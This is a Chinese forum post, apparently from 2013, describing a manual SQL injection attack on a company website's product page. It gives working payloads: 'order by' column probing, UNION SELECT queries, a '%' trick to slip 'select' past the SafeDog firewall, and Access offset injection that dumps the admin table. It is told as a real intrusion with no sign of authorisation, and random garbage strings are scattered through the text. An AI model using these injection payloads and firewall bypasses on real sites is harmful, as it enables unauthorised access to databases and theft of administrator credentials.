找回密码
 立即注册
查看: 2757|回复: 0
打印 上一主题 下一主题

一次手工渗透突破安全狗防御+ACCESS偏移注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-8 21:49:45 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
打开网站,一个企业站。9 e+ P3 o. \3 I* K6 l6 N4 f

& d2 t& t) b; w  h! b
* S8 b# X* \/ U5 C. ^9 M) ]顺手加个admin
2 T3 A7 p- X6 j  b# u- ?6 R; ?' B2 p5 M2 V
4 U4 P9 j& }/ [# j" d* ^! k
默认后台。
$ a. z' N- O9 \; S: o) M回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。​: X% q1 `. a$ V2 O4 W" z
7 E' o. ?+ P" D/ X) p$ B
# K/ Q& W: h' b- {6 \6 T

4 L1 @5 q( C* Q所以就不用御剑扫了,待会直接封IP。! i! R0 j+ V# ]7 d6 W4 J- I7 k

& h5 v- A! |8 ^2 Q, }0 x, r用order by语句判断是否存在注入。! L) v& B/ ^! i2 X1 e6 }6 c) u" ~
http://www.xxx.com /product_show.asp?id=997 order by 1! y) v& a  Y4 Z: V$ J1 J( _" \# G! O
http://www.xxx.com /product_show.asp?id=997 order by 1006 x8 K8 c  }9 `6 E8 y6 M$ L% ]
现在存在注入,经测试后发现是9个字段。$ i4 B$ i4 s+ ?3 d% w2 i
$ Y; u- X3 r8 m( y2 o! _
接下来进行联合查询,猜是否存在admin表。
% O# E1 @. F. y6 A1 ]+ Z! Lhttp://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。​
2 ^0 `2 P8 w# s8 x5 q/ n, `/ K; }4 m5 z: T: I! @: [; |8 g
9 ]& S6 c" y/ }1 |8 w* ~5 Y

1 Y% s. m/ A6 ?% }. u/ X' I# R3 m在select中间加个%,se%lect绕过安全狗。
2 b, t5 v3 m6 L3 T/ T" [0 ^. @6 |6 ^
; C! _, `8 u: z8 N  V6 y4 v+ {; ]5 e4 ^
发现存在admin表,然后开始手工猜常用的字段。
6 |0 P" ^( f5 m! M8 P6 f" h纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
' ^  J1 y) c9 f$ k( w& C' H4 G/ F6 b
9 x4 _& p9 ?6 a+ b1 b/ o突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
( u" u+ ^! E; M: q3 f9 F, @
: @2 L2 v- G3 ]1 z2 a科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。' Z7 D% U" M9 z7 C! t4 Z
http://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
+ h" ~. K) [  S* {好了,敏感内容出显了。​
; U3 u; z+ z$ d( b
" [( S: N( b8 j+ m- \. y) J/ A
; P( G6 I  \4 W0 m( d$ F/ F% a* \! W
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表